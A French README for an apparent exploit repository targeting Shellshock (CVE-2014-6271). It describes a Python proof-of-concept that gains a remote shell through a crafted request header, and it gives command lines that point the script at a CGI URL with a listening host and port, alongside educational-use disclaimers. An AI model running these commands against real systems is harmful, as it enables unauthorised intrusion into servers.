
Exploit Shellshock (CVE-2014-6271)
Ce dépôt contient un exploit pour une vulnérabilité qui affecte les systèmes basés sur Unix. Veuillez noter que ceci n'est qu'un script de preuve de concept créé à des fins éducatives et doit être utilisé de manière responsable.
Cet exploit est conçu pour démontrer comment l'attaque Shellshock fonctionne et comment elle pourrait être utilisée pour obtenir un accès shell à un système via un en-tête de requête malveillamment conçu.
Ce dépôt est destiné uniquement à des fins éducatives. N'utilisez pas ce code ni aucune information qu'il contient à des fins malveillantes. Suivez toujours les directives éthiques et respectez la loi.
Utilisation :
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
Exemple :
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
Prérequis :
Clonez ce dépôt sur votre machine locale.
git clone https://github.com/AlissonFaoli/Shellshock.git
Accédez au répertoire du projet.
cd Shellshock
Exécutez le script shellshock.py.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
Cet exploit est publié sous la licence MIT. Vous trouverez plus d'informations à ce sujet dans le fichier LICENSE.
Si vous avez des questions ou des préoccupations concernant cet exploit, n'hésitez pas à contacter l'auteur.